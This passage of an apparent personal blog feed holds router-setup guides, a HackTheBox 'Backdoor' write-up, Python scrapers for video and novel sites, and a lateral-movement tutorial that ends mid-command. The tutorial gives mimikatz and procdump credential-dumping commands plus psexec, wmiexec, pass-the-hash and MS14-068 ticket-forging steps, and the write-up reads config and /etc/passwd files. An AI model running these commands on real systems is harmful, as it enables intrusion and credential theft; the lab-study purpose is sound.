online.</p><p><strong>If you cannot get online after these settings, check the firewall or DNS!</strong></p><p>Finally, I will explain how to route only certain devices on the LAN through the OpenWrt bypass router.</p><h3 id="设备分流"><a href="#设备分流" class="headerlink" title="设备分流"></a>Per-Device Traffic Splitting</h3><p>As everyone knows, devices that go through the bypass router see a noticeable drop in speed. So is there a way to send devices that do not need the proxy through the main router only, and those that do through the bypass router? Yes. Better still, devices on the main router alone can saturate the home's gigabit bandwidth!</p><p>In the iKuai backend under "Network Settings" > "DHCP Settings" > "DHCP Static Assignment", manually set the gateway of devices that need the proxy to the bypass router IP; disable the rule when the proxy is not needed, as shown:</p><p><img src="https://s2.loli.net/2022/09/17/Ywx32fIGQeLvcy7.png" alt="img"></p><p>Reconnect to the home Wi-Fi (or unplug and replug the cable on a desktop) and you will see the gateway has changed. If both domestic and overseas sites load normally, you are done!</p><p>I will not cover IPv6 configuration here, since Wuhan Telecom has not enabled it yet.</p><p>Finally, the topology after the overhaul:</p><p><img src="https://s2.loli.net/2022/09/17/zBTnevPfYblaEIZ.jpg" alt="New Ruiyunju network topology (dual soft routers)"></p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>Summary</h2><p>That wraps up the home network overhaul series. After using it for a while, the dual soft-router setup is really great! For advanced things like adding SSL certificates, port forwarding and DDNS, please search online or see my earlier posts. Thanks for reading!</p>]]></content>
<categories>
<category>Life Snippets</category>
</categories>
<tags>
<tag>Gadget Tinkering</tag>
</tags>
</entry>
<entry>
<title>Home Network Overhaul (Part 1)</title>
<link href="/2022/05/21/%E5%AE%B6%E5%BA%AD%E7%BD%91%E7%BB%9C%E6%94%B9%E9%80%A0%EF%BC%88%E4%B8%8A%EF%BC%89/"/>
<url>/2022/05/21/%E5%AE%B6%E5%BA%AD%E7%BD%91%E7%BB%9C%E6%94%B9%E9%80%A0%EF%BC%88%E4%B8%8A%EF%BC%89/</url>
<content type="html"><![CDATA[<h2 id="网络环境"><a href="#网络环境" class="headerlink" title="网络环境"></a>Network Environment</h2><p>Wuhan Telecom 300M broadband, the optical modem does the dial-up, dynamic public IP</p><p>Original network topology:</p><p><img src="https://s2.loli.net/2022/05/15/14vfLbR3x2NQyPa.png" alt="Old network topology"></p><h2 id="背景"><a href="#背景" class="headerlink" title="背景"></a>Background</h2><p>I moved into a new home last summer. At first the old network gear got by, but as devices multiplied, stability and speed became a real concern. Since I need a proxy for overseas access, I have used a main + bypass router architecture ever since moving in (see figure 1). Many people recommend this setup, but outbound traffic has to go from the main router to the bypass router and back to the main router, which wastes bandwidth and slows things down, so I decided to rebuild the home network.</p><p>I had earlier bought a soft-router box and installed ESXi 6.7 on it, running several VMs for my various needs. I also have an ASUS TUF-AX3000 grabbed in last year's Singles' Day sale, with dual-band Wi-Fi 6 and a modified Merlin firmware. So I came up with two home networking plans:</p><p>1. The ASUS router as the main router doing PPPoE + proxying, with ESXi on the soft router joining the LAN as an ordinary network device</p><p>2. ESXi on the soft router, with an OpenWrt VM as the main router doing PPPoE + proxying, the other VMs joining the LAN as ordinary devices, and the ASUS router acting as a switch + Wi-Fi access point</p><p>The modified Merlin firmware's proxy plugin does not support the latest trojan and vless protocols and cannot do multi-dial on a single line, so plan 1 is less flexible than OpenWrt; I went with plan 2.</p><h2 id="实施"><a href="#实施" class="headerlink" title="实施"></a>Implementation</h2><p>With the plan settled, it was time to get to work. My soft router was picked up second-hand on Xianyu for a bit over 800 yuan; I will not post a link, to avoid any appearance of promotion. It has an i3-6100U CPU, 8 GB of RAM, Realtek NICs with two gigabit ports, a metal case and power supply, and I added a 256 GB Samsung SSD myself, which is plenty as long as I do not run a NAS on it. Install ESXi from a USB stick first, then download the esir build of OpenWrt and convert it into an ESXi image <strong>(recommended tool: StarWind V2V Converter)</strong>. The installation steps are covered in other people's articles, so I will not go into detail.</p><p>First, connect the ESXi management port to your computer and open the ESXi web management backend. Choose "Networking" in the left menu to see options such as virtual switches and physical NICs (the <code>Wan</code> and <code>WAN</code> shown here were added later):</p><p><img src="https://s2.loli.net/2022/05/15/qmDIMSPRFVg9UKa.jpg" alt="1"></p><p>Under "Virtual switches", add a new one; you can copy my configuration. I named it <code>Wan</code>:</p><p><img src="https://s2.loli.net/2022/05/15/haeEugnCx7F2vWm.jpg" alt="2"></p><p>Then create a new port group on the virtual switch you just created; I named it <code>WAN</code>:</p><p><img src="https://s2.loli.net/2022/05/15/HAcnNqRyCDhKI5d.jpg" alt="3"></p><p>Go back to the OpenWrt VM installed earlier, power it off and add a new virtual network adapter, choosing the <code>WAN</code> port group just created:</p><p><img src="https://s2.loli.net/2022/05/15/D4NLJBPQAduX2lw.jpg" alt="4"></p><p>In the OpenWrt backend, go to "Network > Interfaces" in the sidebar and edit the wan and wan6 interfaces. Under "Physical Settings", tick the matching option:</p><p><img src="https://s2.loli.net/2022/05/15/3CeyuqTgDavL6xW.jpg" alt="5"></p><p>In "General Setup" for wan/wan6, change "Protocol" to "PPPoE", enter your broadband username and password, then Save & Apply.</p><p>Likewise, configure the lan interface. Change "Protocol" to "Static address", set "IPv4 address" to 192.168.xxx.1; "Use custom DNS servers" is optional. Because the ASUS router will only act as a switch and provides no DHCP, enable OpenWrt's DHCP server: scroll down to "DHCP Server > General Setup", untick "Ignore interface", tick "Dynamic DHCP" under "Advanced Settings", then Save & Apply.</p><p>Connect the soft router's WAN port to the optical modem and its LAN port to a computer; if the computer can get online, you are almost there. One step remains: setting up the switch. Some may ask: why not use the ASUS router as a second-level router, with OpenWrt's LAN port connected to the router's WAN port and "WAN" set to "Automatic IP" in the ASUS backend? Isn't that easier? A second-level router means the other LAN devices sit on a different subnet from OpenWrt, and all their traffic must pass through an extra NAT on the ASUS router, which costs some speed and adds gaming latency. So I use the ASUS router as a switch.</p><p>Disconnect the computer from OpenWrt, connect it by cable to an ASUS router LAN port and open the router backend. Under "Advanced Settings > LAN > LAN IP" in the sidebar, change the ASUS router's IP to another address in the same subnet as OpenWrt, making sure it does not conflict. Then go to "DHCP Server" and turn off the ASUS router's DHCP.</p><p><img src="https://s2.loli.net/2022/05/15/Cn3JKjfX4yFIeoa.jpg" alt="6"></p><p>Connect OpenWrt's LAN port to an ASUS router LAN port and leave the ASUS WAN port empty; the ASUS router now behaves as a switch.</p><p>Finally, the topology after the overhaul:</p><p><img src="https://s2.loli.net/2022/09/17/scd6QgX8xmzIRGK.jpg"></p><p>Advanced topics such as DDNS, port forwarding and external access are out of scope here. The setup is a bit tedious, but it is configure once, use for a long time, and it is very comfortable to live with. Tune it to your own needs!</p>]]></content>
<categories>
<category>Life Snippets</category>
</categories>
<tags>
<tag>Gadget Tinkering</tag>
</tags>
</entry>
<entry>
<title>HackTheBox--Backdoor</title>
<link href="/2022/02/28/HackTheBox-Backdoor/"/>
<url>/2022/02/28/HackTheBox-Backdoor/</url>
<content type="html"><![CDATA[<p>A long-overdue writeup, catching up over the winter break, and picking up a few HTB points from this box along the way (doge)</p><h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>Information Gathering</h2><p>Fire up nmap and scan everything: three open ports come back, 22, 80 and 1337</p><p><img src="https://s2.loli.net/2022/02/08/Jg4Tpm2IVRUAkcM.png" alt="1"></p><p>The website turns out to be WordPress, so the next thought is scanning the plugins with wpscan:</p><figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash">wpscan --url http://10.10.11.125/ --plugins-detection aggressive --enumerate u,p<br></code></pre></td></tr></table></figure><p>The scan takes a long time and turns up nothing useful.</p><h2 id="getshell"><a href="#getshell" class="headerlink" title="getshell"></a>getshell</h2><p>Looking at the wpscan output, I thought of checking the plugins directory, and it turned out to allow Apache directory listing:</p><p><img src="https://s2.loli.net/2022/02/07/rgRUI8G47hyAijq.png"></p><p>A search for exploits related to the ebook plugin actually found one: <a href="https://www.exploit-db.com/exploits/39575">https://www.exploit-db.com/exploits/39575</a></p><p>It is an arbitrary file download. Following the PoC, I downloaded the WordPress configuration file first and found the database username and password:</p><p><img src="https://s2.loli.net/2022/02/07/7JQarqjGuUDdsM4.png"></p><p>Trying that username and password on the WordPress admin login failed. So the only option was to download other important files, such as <code>/etc/passwd</code>, where I found the username <code>user</code>. I also tried downloading an SSH public key, but that failed.</p><p>Then I remembered that although I could not upload pspy, I could still read process information. Downloading <code>/proc/sched_debug</code> to list processes, I spotted an unusual gdbserver process:</p><p><img src="C:\Users\Admin\Desktop\HTB--Backdoor\4.png"></p><p>Downloading the corresponding process file <code>/proc/29222/cmdline</code> revealed its port, which was exactly the 1337 found earlier. A search for a gdbserver exploit: <a href="https://www.exploit-db.com/exploits/50539">https://www.exploit-db.com/exploits/50539</a></p><p>Run the script and follow the prompts:</p><p><img src="https://s2.loli.net/2022/02/08/TLW3a6GuoJ9rpcx.png" alt="5"></p><p>Something went wrong at some step here, and the reverse shell never came back... No choice but to try msf. After switching to msf, I got a shell:</p><p><img src="https://s2.loli.net/2022/02/08/lzXwc2EPtWITFsf.png" alt="6"></p><p>The user flag is in <code>/home/user</code>.</p><h2 id="权限提升"><a href="#权限提升" class="headerlink" title="权限提升"></a>Privilege Escalation</h2><p>I suddenly remembered the recently disclosed universal Linux privilege escalation bug, <strong>CVE-2021-4034</strong>. After uploading it via Python 3's built-in HTTP server and running it, it threw the following error:</p><p><img src="https://s2.loli.net/2022/02/08/QwScAXaqv3UfT8D.png" alt="7"></p><p><code>sudo -l</code> was no help either. Fine, no shortcuts then... The usual routine: upload pspy to watch processes, and sure enough there was something running as root:</p><p><img src="https://s2.loli.net/2022/02/08/a59zghSK2pox7cY.png" alt="8"></p><p>Another dull scheduled-task privilege escalation, a classic HTB pattern. I found the following about the <code>screen</code> command:</p><blockquote><p>With the "-x" option we can attach to a session that is already attached elsewhere. In this case the session is already running as root, so we can attach to it to gain root access.</p><p>We must set the terminal emulator to Linux with export TERM=xterm. You can check your TERM setting by running echo $TERM. Now just run the screen command as shown.</p></blockquote><p>Note: this must be run inside a Python interactive terminal:</p><figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash">python3 -c "import pty;pty.spawn('/bin/bash')" # spawn an interactive TTY via Python<br>export TERM=xterm<br>/usr/bin/screen -x root/root<br></code></pre></td></tr></table></figure><p>Privilege escalation succeeded:</p><p><img src="https://s2.loli.net/2022/02/08/SYjfhPwb5pkQryU.png" alt="9"></p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>Summary</h2><p>This box is fairly realistic, though for someone at my junior security-services level it was far from easy. After a few twists and turns, it was finally done!</p><p><img src="https://s2.loli.net/2022/02/08/476lxjZDtkYV3Sq.png"></p>]]></content>
<categories>
<category>Target Practice Notes</category>
</categories>
<tags>
<tag>HackTheBox</tag>
</tags>
</entry>
<entry>
<title>Scraping Yunbo TV Movies with Python and FFmpeg</title>
<link href="/2022/02/24/Python+FFmpeg%E7%88%AC%E5%8F%96%E4%BA%91%E6%92%ADTV%E7%94%B5%E5%BD%B1/"/>
<url>/2022/02/24/Python+FFmpeg%E7%88%AC%E5%8F%96%E4%BA%91%E6%92%ADTV%E7%94%B5%E5%BD%B1/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h2><p>I have recently been learning to write crawlers in Python. After watching videos on "Bilibili University", I wrote one by imitation and added multithreading. This crawler suits video sites where the m3u8 link has to be fetched twice, and it extracts links with regular expressions. The idea in steps:<br>1. Get the source of the video player page and inspect the elements of the player area<br>2. Find the first m3u8 link (usually escaped with backslashes, so the crawler has to strip them)<br>3. Download the first m3u8, extract the path inside it, and join it with the common part of the link to get the second m3u8 link<br>4. Download the video with ffmpeg plus multithreading<br>Enough talk, here is the code!</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>Main Text</h2><h3 id="安装环境"><a href="#安装环境" class="headerlink" title="安装环境"></a>Setting Up the Environment</h3><p><strong>1. Download ffmpeg on Windows</strong><br>Get ffmpeg first: <a href="https://ffmpeg.org/download.html">ffmpeg official site</a><br>Download and extract the matching build (I used <code>ffmpeg-n5.0-latest-win64-lgpl-5.0</code>) and add it to the Windows system variables (This PC > Properties > Advanced system settings > Environment Variables):<br><img src="https://s2.loli.net/2022/02/24/tC5AxrvOlEy1enf.jpg" alt="Adding a Windows environment variable"><br><strong>2. Install the ffmpy3 library for Python:</strong></p><figure class="highlight awk"><table><tr><td class="code"><pre><code class="hljs awk">pip3 install ffmpy3 -i https://mirrors.aliyun.com/pypi/simple/<br></code></pre></td></tr></table></figure><h3 id="编写代码"><a href="#编写代码" class="headerlink" title="编写代码"></a>Writing the Code</h3><figure class="highlight python"><table><tr><td class="code"><pre><code class="hljs python">#!/usr/bin/python3.9<br># -*- coding: utf-8 -*-<br>#<br># Copyright (C) 2022 HackerTerry, Inc. All Rights Reserved<br>#<br># @Time : 2022/2/3 14:07<br># @Author : Terry Zhang<br># @Email : goudan1974@163.com<br># @Blog : https://www.terry906.top<br># @File : 线程池爬云播TV视频.py<br># @Software: PyCharm<br><br>import requests<br>import re<br>from concurrent.futures import ThreadPoolExecutor<br>from ffmpy3 import FFmpeg<br><br>def get_first_m3u8(url, headers):  # get the first m3u8 link from the player page<br>    # headers must be passed by keyword: as a positional argument requests treats it as params<br>    resp = requests.get(url, headers=headers)<br>    obj = re.compile(r'"link_pre":"","url":"(?P&lt;first_m3u8&gt;.*?)","url_next"', re.S)  # adjust the regex as needed<br>    m3u8_url = obj.finditer(resp.text)<br>    for it in m3u8_url:<br>        first_m3u8 = it.group("first_m3u8").replace("\\", "")  # strip the backslash escaping<br>        print(first_m3u8)<br>        return first_m3u8<br>    raise ValueError("no m3u8 link found in the page source")<br><br>def download_first_m3u8(url, name, headers):  # save the first m3u8 file and read the URI line from it<br>    resp = requests.get(url, headers=headers)<br>    with open(name, "w", encoding="utf-8") as f1:<br>        f1.write(resp.text)<br>    with open(name, "r", encoding="utf-8") as f2:<br>        for line in f2:<br>            if line.startswith("#"):  # skip playlist tags; the first non-tag line is the URI<br>                continue<br>            line = line.strip()  # strip() returns a new string, it does not modify in place<br>            print(line)<br>            return line<br>    raise ValueError("no URI line found in the first m3u8 file")<br><br>def get_second_m3u8(url, headers):  # get the second m3u8 link<br>    first_m3u8 = get_first_m3u8(url, headers)<br>    line = download_first_m3u8(first_m3u8, "爬到的视频/first_m3u8.txt", headers)<br>    second_m3u8 = first_m3u8.split("/20220112")[0] + line  # join the common prefix with the path from the playlist<br>    print(second_m3u8)<br>    return second_m3u8<br><br>def ffmpeg_path(inputs_path, outputs_path):  # ffmpeg download function<br>    '''<br>    :param inputs_path: input file, passed as a dict {file: options}<br>    :param outputs_path: output file, passed as a dict {file: options}<br>    :return:<br>    '''<br>    a = FFmpeg(<br>        inputs={inputs_path: None},<br>        outputs={outputs_path: '-c copy'},<br>    )<br>    print(a.cmd)<br>    a.run()<br><br>if __name__ == '__main__':<br>    url = "https://www.yunbtv.net/vodplay/ITgou-1-1.html"  # only this URL needs changing when using the script<br>    headers = {<br>        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",<br>        "Referer": "https://www.yunbtv.net/"<br>    }<br>    second_m3u8 = get_second_m3u8(url, headers)<br>    with ThreadPoolExecutor(50) as t:<br>        t.submit(ffmpeg_path, second_m3u8, "爬到的视频/IT狗第一集.mp4")<br></code></pre></td></tr></table></figure><p>Because the second m3u8 file already carries the link to the AES decryption key, decryption needs no separate handling; ffmpeg takes care of it.</p>]]></content>
<categories>
<category>Python Security Development</category>
</categories>
<tags>
<tag>Crawlers</tag>
</tags>
</entry>
<entry>
<title>Scraping Biquge Novels with a Python Crawler</title>
<link href="/2022/02/24/Python%E7%88%AC%E8%99%AB%E7%88%AC%E5%8F%96%E7%AC%94%E8%B6%A3%E9%98%81%E5%B0%8F%E8%AF%B4/"/>
<url>/2022/02/24/Python%E7%88%AC%E8%99%AB%E7%88%AC%E5%8F%96%E7%AC%94%E8%B6%A3%E9%98%81%E5%B0%8F%E8%AF%B4/</url>
<content type="html"><![CDATA[<p>This is my first project after learning Python; the algorithm may not be perfect, so advice from the experts is welcome!</p><p>Site: <a href="https://www.bbiquge.net/">https://www.bbiquge.net/</a></p><p>Usage: just change the URL at the program entry point and the save path; the URL is that of the novel's introduction page</p><p>The code:</p><figure class="highlight python"><table><tr><td class="code"><pre><code class="hljs python">#!/usr/bin/python3.9<br># -*- coding: utf-8 -*-<br>#<br># Copyright (C) 2022 HackerTerry, Inc. All Rights Reserved<br>#<br># @Time : 2022/1/24 22:12<br># @Author : Terry Zhang<br># @Email : goudan1974@163.com<br># @Blog : https://terry906.top<br># @File : 异步爬小说.py<br># @Software: PyCharm<br><br># Liu Cixin's "The Wandering Earth" is used as the example here<br># All chapter contents and titles: https://www.bbiquge.net/book_126623/<br># A single chapter: https://www.bbiquge.net/book_126623/45495704.html<br><br>import requests<br>import os<br>import json<br>from lxml import etree<br><br>os.environ['NO_PROXY'] = 'www.bbiquge.net'<br>catalog = {}  # title -> chapter URL (renamed from "dict", which shadowed the built-in type)<br>title_list = []<br>link_list = []<br><br>def getCatalog(url, headers):<br>    # headers must be passed by keyword: as a positional argument requests treats it as params<br>    resp = requests.get(url, headers=headers).text<br>    tree = etree.HTML(resp)<br>    a_list = tree.xpath("/html/body/div[4]/dl[@class='zjlist']/dd/a[@href]")<br>    for a in a_list:  # one pass over the chapter links; the original nested loop appended every title len(a_list) times<br>        title = a.xpath("text()")[0]<br>        link = a.xpath("@href")[0]<br>        title_list.append(str(title))<br>        link_list.append(str(link))<br>        catalog[title] = url + link<br>    with open("爬到的小说/小说列表.txt", "w", encoding="utf-8") as f:<br>        f.write(json.dumps(catalog, ensure_ascii=False))  # json.dumps serialises the dict into the file<br>    print(catalog)<br>    return catalog<br><br><br>def getContent(url, headers):<br>    resps = requests.get(url, headers=headers).text<br>    trees = etree.HTML(resps)<br>    article = trees.xpath("/html/body/div[3]/div[2]/div[1][@id='content']/text()")<br>    print(article)<br>    return article<br><br>if __name__ == '__main__':<br>    url = 'https://www.bbiquge.net/book_126623/'<br>    headers = {<br>        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.55",<br>        "Referer": "https://www.bbiquge.net/book_126623/",<br>        "Connection": "close"<br>    }<br>    if not os.path.exists("爬到的小说/笔趣阁"):<br>        print("没有'笔趣阁'这个目录,正在为你创建>>>>>")<br>        os.makedirs("爬到的小说/笔趣阁")  # makedirs also creates the missing parent directory<br>        print("创建成功>>>>>")<br>    dicts = getCatalog(url, headers)<br>    for key, value in dicts.items():<br>        articles = getContent(value, headers)<br>        with open("爬到的小说/笔趣阁/流浪地球" + key + ".txt", "w", encoding="utf-8") as f:<br>            f.writelines(str(articles).replace("&quot;", "").replace("\xa0", "") + '\n')  # writelines accepts a string or a list<br></code></pre></td></tr></table></figure>]]></content>
<categories>
<category>Python Security Development</category>
</categories>
<tags>
<tag>Crawlers</tag>
</tags>
</entry>
<entry>
<title>Intranet Penetration (5): Lateral Movement</title>
<link href="/2022/01/25/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%BA%94%EF%BC%89-%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/"/>
<url>/2022/01/25/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%BA%94%EF%BC%89-%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/</url>
<content type="html"><![CDATA[<h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>Introduction</h2><p>In intranet penetration, once an attacker controls one machine on the internal network, they use the compromised host as a pivot and, by collecting domain credentials and other means, access other machines in the domain to expand the set of controlled assets. Through such techniques the attacker may eventually gain access to the domain controller, and even fully control the entire Windows-based internal network and every machine in the domain. Linux hosts may also appear in the domain, though rarely.</p><h2 id="利用方式"><a href="#利用方式" class="headerlink" title="利用方式"></a>Techniques</h2><p>First, information gathering is indispensable. Passwords or hashes are usually dumped with mimikatz (nicknamed "the French baguette"). Note that this tool requires administrator privileges, and in real engagements it also needs AV evasion. If the target host is Linux, mimipenguin can be used instead.</p><p>A few common commands:</p><figure class="highlight powershell"><table><tr><td class="code"><pre><code class="hljs powershell">privilege::debug # raise to debug privilege<br>sekurlsa::logonpasswords # dump passwords<br></code></pre></td></tr></table></figure><p>When mimikatz cannot be uploaded or gets flagged, it can be used together with procdump. procdump comes with Windows and is not blocked by antivirus. Common commands:</p><figure class="highlight powershell"><table><tr><td class="code"><pre><code class="hljs powershell">Run with procdump:<br>procdump -accepteula -ma lsass.exe lsass.dmp<br>Run in mimikatz:<br>privilege::debug<br>sekurlsa::minidump lsass.dmp<br>sekurlsa::logonPasswords full<br></code></pre></td></tr></table></figure><p><strong>Creating scheduled tasks over an IPC connection (target must have ports 135 and 445 open)</strong></p><p>IPC$ (Internet Process Connection) is the shared "named pipe" resource: a named pipe opened for inter-process communication. By supplying a trusted username and password, the two sides establish a secure channel and exchange encrypted data over it, giving access to the remote computer. IPC$ is a feature introduced in NT/2000, and one of its characteristics is that only one connection is allowed between two IPs at any one time. IPC grants the corresponding privileges after validating a username and password, and is commonly used for remote computer management and viewing a computer's shared resources.</p><p>Through ipc$ a connection can be established with the target machine. Over that connection one can not only access files on the target for upload and download, but also run other commands on it to obtain its directory structure, user list and other information.</p><p>Exploitation flow:</p><p>1. Establish an IPC connection to the target host</p><p>2. Copy the command script to be executed to the target host</p><p>3. Check the target's time and create a scheduled task (at, schtasks) to run the copied script</p><p>4. Delete the IPC connection</p><p>Only the at and schtasks scheduled-task methods are covered here; in practice, choose the scheduled-task type according to the system version.</p><p>1. at (Windows Server &lt; 2012)</p><figure class="highlight powershell"><table><tr><td class="code"><pre><code class="hljs powershell">net use \\目标机器IP\ipc$ "明文密码" /user:域名\域管理员用户名 # establish the ipc connection<br>copy 文件名.bat \\目标机器IP\c$ # copy the bat file containing the system commands to the target<br>at \\目标机器IP 时:分 c:\add.bat # add the scheduled task<br></code></pre></td></tr></table></figure><p>2. schtasks (Windows Server &gt;= 2012)</p><figure class="highlight powershell"><table><tr><td class="code"><pre><code class="hljs powershell">net use \\目标机器IP\ipc$ "明文密码" /user:域名\域管理员用户名 # establish the ipc connection<br>copy add.bat \\目标机器IP\c$ # copy the file to its C: drive<br>schtasks /create /s 目标机器IP /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\文件名.bat /F 对应执行文件 # create the adduser task<br>schtasks /run /s 目标机器IP /tn adduser /i # run the adduser task<br>schtasks /delete /s 目标机器IP /tn adduser /f # delete the adduser task<br></code></pre></td></tr></table></figure><p><strong>Using the SMB service (target must have port 445 open)</strong></p><p>Download: <a href="https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec">https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec</a></p><p>psexec is an excellent remote command-line tool for Windows. Using it does not require port 3389 on the remote host, only the admin$ share (enabled by default). However, if the target has its firewall on, psexec cannot be used either and reports that the network path was not found. Because psexec is a tool provided by Windows, antivirus software whitelists it. Connections do generate logs, so be careful to clean up.</p><p>How psexec works:</p><p>1. Over the ipc$ connection, it drops the binary psexecsvc.exe onto the target</p><p>2. Through the service manager (SCManager) it remotely creates a psexec service and starts it</p><p>3. The client connects and sends commands; the server side launches the program through the service, executes the commands and returns the output</p><p>4. The service is deleted when finished</p><p>There are two ways to use it: one requires an IPC connection and the plaintext password; the other needs no IPC connection and can authenticate with a hash, but requires the third-party Impacket package and, in practice, AV evasion.</p><p>The first case:</p><figure class="highlight powershell"><table><tr><td class="code"><pre><code class="hljs powershell">net use \\目标机器IP\ipc$ "明文密码" /user:管理员用户名<br>psexec \\目标机器IP -s cmd # requires an existing ipc connection; -s runs as System<br></code></pre></td></tr></table></figure><p>The second case:</p><figure class="highlight powershell"><table><tr><td class="code"><pre><code class="hljs powershell">psexec \\目标机器IP -u 域管账户 -p 明文密码 -s cmd<br>psexec -hashes :$HASH$ ./域管账户@目标机器IP<br>psexec -hashes :$HASH$ 域名/域管账户@目标机器IP<br>psexec -hashes :hash值 ./administrator@目标机器IP # the official PsTools cannot connect with a hash<br></code></pre></td></tr></table></figure><p>Of course msf's built-in psexec module can also be used; the module path is <code>exploit/windows/smb/psexec</code>.</p><p><strong>Using the WMI service (target must have management port 135 and output port 445 open)</strong></p><p>WMI stands for "Windows Management Instrumentation". Every Windows version since Windows 98 supports it. WMI is a set of tools that can communicate for remote access via remote procedure calls (RPC) on port 135 using the /node option, letting system administrators perform automated management tasks remotely, such as starting services or executing commands.</p><p>Likewise, there are three ways to connect to the WMI service, each with its pros and cons.</p><p>The first is the built-in wmic. It only supports plaintext passwords, and command execution produces no output, so the output has to be redirected to a txt file to read. But precisely because it is built into the system, AV evasion is not a concern.</p><figure class="highlight powershell"><table><tr><td class="code"><pre><code class="hljs powershell">wmic /node:目标机器IP /user:域管账户 /password:域管明文密码 process call create "cmd.exe /c 系统命令 >C:\文件名.txt"<br></code></pre></td></tr></table></figure><p>The second is CScript, also built into Windows, used together with a VBS script (<em>download: <a href="https://pan.baidu.com/s/1Vh4ELTFvyBhv3Avzft1fCw">https://pan.baidu.com/s/1Vh4ELTFvyBhv3Avzft1fCw</a> extraction code: xiao</em>). It only supports plaintext passwords, but command execution returns output, and again AV evasion is not a concern.</p><figure class="highlight powershell"><table><tr><td class="code"><pre><code class="hljs powershell">cscript //nologo wmiexec.vbs /shell 目标机器IP 域管账户 域管明文密码<br></code></pre></td></tr></table></figure><p>The third relies on the third-party Impacket package; it supports plaintext or hash authentication and returns output, but AV evasion has to be considered.</p><figure class="highlight powershell"><table><tr><td class="code"><pre><code class="hljs powershell">wmiexec ./本地管理员账户:明文密码@目标机器IP "系统命令"<br>wmiexec 域名/域管账户:明文密码@目标机器IP "系统命令"<br>wmiexec -hashes :hash值 ./本地管理员账户@目标机器IP "系统命令"<br>wmiexec -hashes :hash值 域名/域管账户@目标机器IP "系统命令"<br></code></pre></td></tr></table></figure><p><strong>Using a Python script to exploit hashes in bulk</strong></p><p>This script is one of the tools in the impacket toolkit, mainly used when moving laterally from Linux to Windows; it is very powerful and can reach the intranet through a SOCKS proxy.</p><p>GitHub project: <a href="https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py">https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py</a></p><p>Partly reproduced from: <a href="https://www.freebuf.com/articles/network/251364.html">Intranet Penetration Testing: Fundamentals of Lateral Movement - FreeBuf</a></p><p><strong>Pass the Hash (PTH)</strong></p><p>Most penetration testers have heard of Pass the Hash attacks, which work by obtaining the password hash (usually the NTLM hash) associated with an account. In a domain environment users mostly log on with domain accounts, and many computers are installed with the same local administrator username and password; so if the local administrator credentials are identical across machines, an attacker can use pass the hash to log on to other computers in the intranet. At the same time, pass the hash saves the attacker the time of cracking the hash. In a Windows network the hash is what proves identity (with the right username and password hash, authentication succeeds), and since Microsoft's own products and tools obviously do not support this kind of attack, attackers typically use third-party tools. On Windows Server 2012 R2 and later, plaintext passwords are not kept in memory by default, so attackers usually use tools to pass the hash to other computers for authentication and thereby control the remote machine.</p><p>Taking mimikatz as an example:</p><figure class="highlight powershell"><table><tr><td class="code"><pre><code class="hljs powershell">privilege::debug<br>sekurlsa::logonpasswords<br>sekurlsa::pth /user:域管账户 /domain:域名 /ntlm:ntlm值<br></code></pre></td></tr></table></figure><p>Then, in the cmd window that mimikatz spawns, establish the connection and run commands. For example:</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs powershell"><span class="hljs-built_in">dir</span> \\目标机器IP\c<span 
class="hljs-variable">$</span><br></code></pre></td></tr></table></figure><p>但是,实战中我们不知道获得的ntlm值属于哪一台主机,这就需要在弹出来的cmd命令行中进行测试。</p><p><strong>票据传递(PTT)</strong></p><p>我们在渗透测试中,要使用哈希传递攻击,则必须要获取目标机器的管理员权限。如果没有管理员权限,我们不妨用用票据传递攻击(PTT)。</p><p>在开始学习票据传递之前,我们有必要了解一下Kerberos协议:<a href="https://www.freebuf.com/articles/web/290907.html">Kerberos协议认证过程(理论篇) - FreeBuf网络安全行业门户</a></p><p>在票据传递攻击(PTT)中,我们常用的有MS14-068、黄金票据、白银票据。其中MS14-068可用来横向获取域内主机权限,黄金票据、白银票据则可以用来对域控进行权限维持。这里我们主要结合mimikatz结合exp来利用MS14-068漏洞,至于黄金票据、白银票据我们将在未来的域内权限维持中讲解。</p><p>首先获取域用户的sid:</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs powershell">whoami /user<br></code></pre></td></tr></table></figure><p>用exp生成伪造的凭证(<a href="https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068">exp下载地址点这里</a>):</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs powershell">ms14<span class="hljs-literal">-068</span>.exe <span class="hljs-literal">-u</span> 域成员名<span class="hljs-selector-tag">@</span>域名 <span class="hljs-literal">-s</span> sid <span class="hljs-literal">-d</span> 域控制器地址 <span class="hljs-literal">-p</span> 域成员密码<br></code></pre></td></tr></table></figure><p>利用mimikatz清空凭证,因为有域成员凭证会影响伪造:</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs powershell">mimikatz <span class="hljs-comment"># kerberos::purge #清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造</span><br>mimikatz <span class="hljs-comment"># kerberos::list 